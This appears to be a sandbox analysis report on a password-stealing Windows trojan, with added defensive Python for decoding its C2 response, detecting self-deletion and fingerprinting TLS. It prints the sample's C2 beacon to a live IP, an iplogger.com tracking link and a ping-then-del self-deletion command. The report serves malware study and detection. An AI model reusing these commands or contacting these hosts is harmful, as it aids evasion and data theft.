section .data: size_of_data 0x0001fc00, virtual_address 0x00033000, virtual_size 0x00020960, entropy 7.95883793239 (description: A section with a high entropy has been found)
entropy 0.332896461337 (description: Overall entropy of this PE file is high)
Data received: binary TLS record data from 205.134.251.88:443 (non-printable; not reproduced here). The only printable token in the captured server bytes is the string DOWNGRD.
ßɲåB—N¼Ð²R a7'tD$ËwÏÚ9$ý}OieóåÜkï£Ø·X. Úwª5³;h%šä¶õ4ýüÐÝ*5kú‚ø™ä뭀88m¤‚V1D­§­¦+ùÎw“&&s9:óOOµæf„A%áX¿MÕA€~XmÙçë%¨uüp†³ê.þmÌû“­ ,êî3z'šÜoX’¾tª IßVhù«-(]i˜Ó»­º~q-áw göOw ùuÈÒ¾ ¢68ÑdQÑ0e€bÞM5´Ý_mÏ(×´É þ§ë|æeK-i>ÕsŸ¡µ%¾OòMðózWàÕWÇj˜]8¼ù!4IîScÚõ[àÝN ,߄ùà—•36ì²Jºå°t¡7$]0îp”ø1º>vº~ï]L)¾û™cÙTOF€Jj+Ès<U1¿]FF'u%}ɦ@Lj}ÁHâ\eWÔ§u3Deˆ•V¦Ž€ À²ïÛ³ÿZ]nöøþ 21:ëI5ðL¨)Dh‘NG «A•ö ¤ê›[ÔAßyéŒ-æ%}/ÖޘñcÛAØ¢ù:Á€/9r÷§„B纴¶y%d4<µ¾5´â~;±§ï.Þ «¿ R‡ó(…²³KèxêŸæ>ÕħáIã fÐ6X" Ò¤À F÷<‰Œ©¥x¯'œþg* S4(šÎ÷Ý·`‰ó K 4þ9n×­âL}úæì≵ºMƒ¯oÚQ} "  ñ«ÎÜäcŸ.G—¬ƒÛCî&¶_Ó­VβuÏ)þdÿš<gՊŸîãØÄè/W3‚G¡»k¡ÏlAvƒ&ºRÉ0õÊ5*‡ŸëÄþaïgÿt ƒ²‡(6Y£—²;,;¬Í² †< ‹uù[Œ6ö9ÜÏÜ`Ú,ªY¶e¬ˆTù njjY7D€òÂó‡†+øFkõMŸÔsñwqžÒ»áåä¡&µá
Data received 0
Data received HTTP/1.1 200 OK
Server: nginx
Date: Thu, 22 Jun 2023 01:34:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive

59
xZPbJglJY8GXNAUHUciy|6MdhbTcM|http://195.123.226.82/index.php|https://iplogger.com/1hKWS4
0
Data sent [120-byte TLS ClientHello record; the only readable part is the server_name (SNI) extension carrying sungeomatics.com, which TLS 1.0 to 1.2 clients send unencrypted; the remaining bytes are binary and omitted here]
Data sent [326 bytes, binary, omitted; the size is consistent with the client's second handshake flight (ClientKeyExchange, ChangeCipherSpec and Finished)]
Data sent [117 bytes, binary, omitted; consistent with the first encrypted application-data record, i.e. the HTTPS request itself]
Data sent GET /index.php?id=017bd04f-b3bf-45b6-8167-9e8f41ff87bf&subid=6MdhbTcM HTTP/1.1
Host: 195.123.226.82
Connection: Keep-Alive
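The plaintext exchange with 195.123.226.82 is worth checking by hand: the 200 OK body is a single chunk whose declared size 0x59 (89 bytes) matches the pipe-delimited line that follows it, its second field (6MdhbTcM) is the subid sent in the GET query string, its third field is the same index.php URL, and the last field is a link on iplogger.com, a service that records the IP address of whoever opens the link. The following Python is an added example, not part of the sandbox report and not code from the sample: it reconstructs the response with the CRLFs the flattened rendering dropped, decodes the chunked transfer coding strictly (a short or unterminated chunk raises rather than yielding a partial payload), and splits out the fields and URLs for blocking.

```python
import re
from typing import Dict, List, Tuple

# The 200 OK captured in the report, with the CRLF line endings that the
# report's flattened rendering dropped (constructed from the report text).
RAW_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: nginx\r\n"
    b"Date: Thu, 22 Jun 2023 01:34:02 GMT\r\n"
    b"Content-Type: text/html; charset=UTF-8\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"Connection: keep-alive\r\n"
    b"\r\n"
    b"59\r\n"
    b"xZPbJglJY8GXNAUHUciy|6MdhbTcM|http://195.123.226.82/index.php|https://iplogger.com/1hKWS4\r\n"
    b"0\r\n"
    b"\r\n"
)


def split_response(raw: bytes) -> Tuple[str, Dict[str, str], bytes]:
    """Split a raw HTTP/1.1 response into status line, lower-cased header map and body bytes."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("no end of headers")
    lines = head.decode("latin-1").split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def decode_chunked(body: bytes) -> bytes:
    """Decode the chunked transfer coding (RFC 9112 section 7.1).

    Every chunk must be complete and CRLF-terminated; a short or unterminated
    chunk raises instead of silently returning a partial payload.
    """
    out = bytearray()
    pos = 0
    while True:
        eol = body.find(b"\r\n", pos)
        if eol < 0:
            raise ValueError("missing chunk-size line")
        size_field = body[pos:eol].split(b";", 1)[0].strip()  # drop chunk extensions
        size = int(size_field, 16)
        pos = eol + 2
        if size == 0:
            return bytes(out)  # last-chunk; any trailer fields are ignored here
        chunk = body[pos:pos + size]
        if len(chunk) != size:
            raise ValueError(f"truncated chunk: declared {size}, got {len(chunk)}")
        out += chunk
        pos += size
        if body[pos:pos + 2] != b"\r\n":
            raise ValueError("chunk data not followed by CRLF")
        pos += 2


URL_RE = re.compile(r"^https?://[^\s|]+$")


def analyse_response(raw: bytes = RAW_RESPONSE) -> dict:
    """Decode the body, split the pipe-delimited fields and list the URLs it carries."""
    status, headers, body = split_response(raw)
    if headers.get("transfer-encoding", "").lower() != "chunked":
        raise ValueError("expected a chunked body")
    payload = decode_chunked(body)
    fields: List[str] = payload.decode("utf-8").split("|")
    return {
        "status": status,
        "payload_len": len(payload),
        "fields": fields,
        "urls": [f for f in fields if URL_RE.match(f)],
    }


if __name__ == "__main__":
    info = analyse_response()
    print(info["status"], info["payload_len"], "bytes")
    for i, f in enumerate(info["fields"]):
        print(f"field[{i}] = {f}")
```

The strict decoder matters when you lift bodies out of a sandbox capture: the recv() hook can return a response split across several reads, and a decoder that tolerates a short last chunk would hand you a truncated second field without any error.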
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
cmdline C:\Windows\System32\cmd.exe /c ping 127.0.0.1 && del "C:\Users\test22\AppData\Local\Temp\postmon.exe" >> NUL
cmdline ping 127.0.0.1
cmdline "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\test22\AppData\Local\Temp\postmon.exe" >> NUL
host 195.123.226.82
file C:\Users\test22\AppData\Local\Temp\postmon.exe
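The cmdline entries above are the usual self-deletion idiom: cmd.exe is handed a ping of 127.0.0.1 (four loopback echo requests, roughly three seconds of doing nothing) followed by a del of the dropped executable. The delay exists because Windows will not delete the image of a running process, so the parent must have exited before del runs; the && means the delete is skipped if ping ever fails, and the >> NUL hides the output. The Python below is an added example, not from the report, that flags this pattern in process-creation command lines and records whether the delay is a pure loopback sleep and whether the deleted path is the parent's own image. The first two sample records are the report's own command lines; the others are constructed variants (timeout instead of ping, ping switches, del switches, an unquoted path).

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# cmd[.exe] /c (ping|timeout) <args> && (del|erase) [/switches] "<path>" [>> NUL]
# The delay arguments are matched loosely so "-n 3", "-w 1000" or "> nul" do not
# break the match; the delete target may be quoted or bare.
SELF_DELETE_RE = re.compile(
    r"""cmd(?:\.exe)?"?\s+/c\s+
        (?P<delay>ping|timeout)\b(?P<delay_args>[^&]*?)\s*&&?\s*
        (?:del|erase)\b\s+(?:/[a-z]\s+)*"?(?P<target>[^"&>]+?)"?\s*(?:>>?\s*nul\b.*)?$""",
    re.IGNORECASE | re.VERBOSE,
)

# Loopback targets that make the ping a sleep rather than a reachability check.
LOOPBACK_RE = re.compile(r"(?<![\w.])(?:127\.0\.0\.1|localhost|::1)(?![\w.])", re.IGNORECASE)


def _norm_path(p: str) -> str:
    return p.strip().strip('"').lower()


@dataclass
class SelfDeleteHit:
    cmdline: str
    delay: str                  # "ping" or "timeout"
    target: str                 # normalised path passed to del
    loopback_delay: bool        # delay pings 127.0.0.1/localhost, i.e. a pure sleep
    deletes_parent_image: bool  # target is the parent process's own executable


def detect_self_delete(cmdline: str, parent_image: Optional[str] = None) -> Optional[SelfDeleteHit]:
    """Return a hit if the command line is a delay-then-delete chain, else None."""
    m = SELF_DELETE_RE.search(cmdline)
    if not m:
        return None
    target = _norm_path(m.group("target"))
    return SelfDeleteHit(
        cmdline=cmdline,
        delay=m.group("delay").lower(),
        target=target,
        loopback_delay=bool(LOOPBACK_RE.search(m.group("delay_args"))),
        deletes_parent_image=parent_image is not None and _norm_path(parent_image) == target,
    )


# Process-creation records: the first two are the report's own command lines,
# the rest are constructed variants of the same idiom.
SAMPLE_EVENTS = [
    {"parent": r"C:\Users\test22\AppData\Local\Temp\postmon.exe",
     "cmdline": r'C:\Windows\System32\cmd.exe /c ping 127.0.0.1 && del "C:\Users\test22\AppData\Local\Temp\postmon.exe" >> NUL'},
    {"parent": r"C:\Windows\System32\cmd.exe", "cmdline": "ping 127.0.0.1"},
    {"parent": r"C:\Users\u\x.exe",
     "cmdline": r'cmd /c ping -n 4 127.0.0.1 > nul && del /f /q "C:\Users\u\x.exe"'},
    {"parent": r"C:\Users\u\y.exe",
     "cmdline": r'"C:\Windows\system32\cmd.exe" /c timeout /t 5 && del C:\Users\u\y.exe'},
    {"parent": r"C:\Windows\explorer.exe",
     "cmdline": r"cmd.exe /c ping 10.0.0.1 && del C:\temp\report.txt"},
]


def scan(events) -> List[SelfDeleteHit]:
    """Run the detector over process-creation records with parent image and command line."""
    hits = []
    for e in events:
        hit = detect_self_delete(e["cmdline"], e["parent"])
        if hit:
            hits.append(hit)
    return hits


if __name__ == "__main__":
    for h in scan(SAMPLE_EVENTS):
        print(f"{h.delay:8} loopback={h.loopback_delay!s:5} self={h.deletes_parent_image!s:5} {h.target}")
```

The two flags separate the strong signal (a process arranging the deletion of its own image after a loopback sleep) from the weaker one (any delay-then-delete chain), so a rule can alert on the first and only log the second; the bare "ping 127.0.0.1" child that cmd.exe spawns is deliberately not a hit on its own.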
Time & API Arguments Status Return Repeated

send

buffer: [120-byte TLS ClientHello record; the server_name (SNI) extension carries sungeomatics.com in cleartext, the remaining bytes are binary and omitted]
socket: 1256
sent: 120
1 120 0

send

buffer: [326 bytes, binary, omitted; consistent with ClientKeyExchange, ChangeCipherSpec and Finished]
socket: 1256
sent: 326
1 326 0

send

buffer: [117 bytes, binary, omitted; consistent with the first encrypted application-data record]
socket: 1256
sent: 117
1 117 0

send

buffer: GET /index.php?id=017bd04f-b3bf-45b6-8167-9e8f41ff87bf&subid=6MdhbTcM HTTP/1.1
Host: 195.123.226.82
Connection: Keep-Alive
socket: 1168
sent: 128
1 128 0
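Because the sandbox hooks send() at the socket layer, everything it records on socket 1256 is what the wire sees: the 120-byte first send is the ClientHello, and the hostname sungeomatics.com is legible in it only because the SNI extension is unencrypted, while the later sends on that socket are ciphertext. The ClientHello also carries the fields JA3 fingerprinting hashes (protocol version, cipher suites, extension types, supported groups and point formats, with GREASE values removed), so a send() buffer is enough to compute the fingerprint offline. The Python below is an added example, not the report's or the sample's code: it parses a ClientHello record the way you would parse such a buffer, returning the SNI, the suite list and the JA3 string and MD5. The input is a constructed ClientHello using the report's SNI with an illustrative suite and extension set (not recovered from the sample's bytes); the GREASE cipher 0x2A2A is included to show it being dropped.

```python
import hashlib
import struct
from dataclasses import dataclass, field
from typing import List, Sequence

# RFC 8701 GREASE values (0x0a0a, 0x1a1a, ... 0xfafa); JA3 drops them so that
# randomised GREASE does not change the fingerprint.
GREASE = {0x0A0A + 0x1010 * i for i in range(16)}


def build_client_hello(sni: str, ciphers: Sequence[int], groups: Sequence[int],
                       point_formats: Sequence[int]) -> bytes:
    """Constructed TLS 1.0 ClientHello with record and handshake framing (test input only)."""
    name = sni.encode("ascii")
    sni_entry = struct.pack("!BH", 0, len(name)) + name        # name_type host_name(0)
    ext_sni = struct.pack("!H", len(sni_entry)) + sni_entry     # server_name_list
    ext_groups = struct.pack("!H", 2 * len(groups)) + b"".join(struct.pack("!H", g) for g in groups)
    ext_pf = struct.pack("!B", len(point_formats)) + bytes(point_formats)
    ext_reneg = b"\x00"                                         # empty renegotiated_connection
    extensions = b"".join(
        struct.pack("!HH", etype, len(data)) + data
        for etype, data in ((0x0000, ext_sni), (0x000A, ext_groups), (0x000B, ext_pf), (0xFF01, ext_reneg))
    )
    body = (
        b"\x03\x01" + bytes(range(32))                          # client_version, fixed fake random
        + b"\x00"                                               # empty session_id
        + struct.pack("!H", 2 * len(ciphers)) + b"".join(struct.pack("!H", c) for c in ciphers)
        + b"\x01\x00"                                           # compression_methods: null only
        + struct.pack("!H", len(extensions)) + extensions
    )
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body   # HandshakeType client_hello(1)
    return b"\x16\x03\x01" + struct.pack("!H", len(handshake)) + handshake


def _u16(buf: bytes, off: int) -> int:
    return struct.unpack("!H", buf[off:off + 2])[0]


@dataclass
class ClientHello:
    version: int
    ciphers: List[int]
    extensions: List[int] = field(default_factory=list)
    groups: List[int] = field(default_factory=list)
    point_formats: List[int] = field(default_factory=list)
    sni: str = ""

    def ja3(self) -> str:
        """JA3 string: version,ciphers,extensions,groups,point_formats (GREASE removed)."""
        def join(values: Sequence[int]) -> str:
            return "-".join(str(v) for v in values if v not in GREASE)
        return ",".join([str(self.version), join(self.ciphers), join(self.extensions),
                         join(self.groups), join(self.point_formats)])

    def ja3_md5(self) -> str:
        return hashlib.md5(self.ja3().encode("ascii")).hexdigest()


def parse_client_hello(buf: bytes) -> ClientHello:
    """Parse the first record of a client's first TLS send; raises if it is not a ClientHello."""
    if len(buf) < 5 or buf[0] != 0x16:
        raise ValueError("not a TLS handshake record")
    hs = buf[5:5 + _u16(buf, 3)]
    if len(hs) < 4 or hs[0] != 0x01:
        raise ValueError("record does not start with a ClientHello")
    hs_len = int.from_bytes(hs[1:4], "big")
    body = hs[4:4 + hs_len]
    if len(body) != hs_len:
        raise ValueError("truncated ClientHello")
    p = 0
    version = _u16(body, p)
    p += 2 + 32                                   # client_version, random
    p += 1 + body[p]                              # session_id
    cs_len = _u16(body, p)
    p += 2
    ciphers = [_u16(body, p + i) for i in range(0, cs_len, 2)]
    p += cs_len
    p += 1 + body[p]                              # compression_methods
    hello = ClientHello(version, ciphers)
    if p + 2 > len(body):
        return hello                              # no extensions block at all
    end = p + 2 + _u16(body, p)
    p += 2
    while p + 4 <= end:
        etype, elen = _u16(body, p), _u16(body, p + 2)
        p += 4
        data = body[p:p + elen]
        p += elen
        hello.extensions.append(etype)
        if etype == 0x0000 and len(data) >= 5:          # server_name: first host_name entry
            hello.sni = data[5:5 + _u16(data, 3)].decode("ascii", "replace")
        elif etype == 0x000A and len(data) >= 2:        # supported_groups
            hello.groups = [_u16(data, 2 + i) for i in range(0, _u16(data, 0), 2)]
        elif etype == 0x000B and len(data) >= 1:        # ec_point_formats
            hello.point_formats = list(data[1:1 + data[0]])
    return hello


# Constructed input: the report's SNI with an illustrative cipher/extension set.
SAMPLE_HELLO = build_client_hello(
    "sungeomatics.com",
    ciphers=[0x2A2A, 0xC013, 0xC014, 0x002F, 0x0035, 0x000A],
    groups=[0x0017, 0x0018],
    point_formats=[0],
)

if __name__ == "__main__":
    hello = parse_client_hello(SAMPLE_HELLO)
    print("SNI:", hello.sni)
    print("JA3:", hello.ja3(), hello.ja3_md5())
```

Feed the first send() buffer of a real capture to parse_client_hello to get the same fields; the parser refuses anything that does not start with a handshake record carrying a ClientHello, so the 326- and 117-byte sends above would raise rather than be misread.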
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
Bkav W32.AIDetectMalware
Lionic Trojan.Win32.Generic.4!c
Elastic malicious (high confidence)
MicroWorld-eScan Trojan.GenericKD.67448968
McAfee Artemis!F7D6BD06F964
Malwarebytes Crypt.Trojan.Malicious.DDS
VIPRE Trojan.GenericKD.67448968
Sangfor Suspicious.Win32.Save.a
CrowdStrike win/malicious_confidence_100% (W)
Arcabit Trojan.Generic.D4053088
Cyren W32/ABRisk.JHSG-8484
Symantec ML.Attribute.HighConfidence
ESET-NOD32 a variant of Win32/Kryptik_AGen.BSD
APEX Malicious
Cynet Malicious (score: 100)
Kaspersky HEUR:Trojan-PSW.Win32.Coins.gen
BitDefender Trojan.GenericKD.67448968
Avast Win32:CrypterX-gen [Trj]
Tencent Win32.Trojan-QQPass.QQRob.Vgil
Emsisoft Trojan.GenericKD.67448968 (B)
F-Secure Trojan.TR/Kryptik.bxgvi
TrendMicro TrojanSpy.Win32.TMLOADER.YXDFIZ
McAfee-GW-Edition BehavesLike.Win32.PUPXTU.fh
Trapmine malicious.high.ml.score
FireEye Generic.mg.f7d6bd06f9643978
Sophos Mal/Generic-S
SentinelOne Static AI - Suspicious PE
Jiangmin Trojan.Scar.mpn
Avira TR/Kryptik.bxgvi
MAX malware (ai score=81)
Antiy-AVL Trojan/Win32.Kryptik
Gridinsoft Ransom.Win32.Sabsik.cl
Microsoft Trojan:Win32/Sabsik.FL.B!ml
ZoneAlarm HEUR:Trojan-PSW.Win32.Coins.gen
GData Trojan.GenericKD.67448968
Google Detected
Acronis suspicious
BitDefenderTheta Gen:NN.ZexaF.36250.xC0@am20nIgi
ALYac Trojan.GenericKD.67448968
VBA32 BScope.TrojanPSW.Coins
Cylance unsafe
TrendMicro-HouseCall TrojanSpy.Win32.TMLOADER.YXDFIZ
Rising Trojan.Generic@AI.97 (RDML:SyFX+TNVNHWNj5WBLAFzRQ)
MaxSecure Trojan.Malware.300983.susgen
Fortinet W32/Kryptik_AGen.BSD!tr
AVG Win32:CrypterX-gen [Trj]
Cybereason malicious.6f9643
DeepInstinct MALICIOUS